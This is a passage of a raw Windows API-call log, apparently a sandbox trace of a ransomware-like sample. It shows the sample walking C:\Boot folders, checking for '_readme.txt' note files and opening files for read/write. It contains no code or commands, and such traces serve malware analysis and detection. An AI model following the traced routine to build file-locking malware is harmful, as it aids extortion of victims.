ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.220] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.220] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.220] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned=".mui" [0097.220] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.220] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19fbf60, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.220] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned=".txt" [0097.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.220] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19fbf60, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.220] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.221] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.221] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.222] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.222] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0097.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.223] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.223] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.223] PathFindFileNameW (pszPath="") returned="" [0097.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.223] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.223] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.223] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.223] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0097.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.224] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.224] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0097.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.224] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0097.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.224] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a220c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a220c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.224] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.224] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a220c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a220c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.224] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.224] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.225] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned=".mui" [0097.225] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.225] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a220c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a220c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a220c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.225] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned=".txt" [0097.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.225] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a220c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a220c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a220c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.225] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.225] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.225] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.225] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.226] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.226] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.227] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.227] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.228] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.228] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.229] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.229] RtlAllocateHeap (HeapHandle=0x630000, 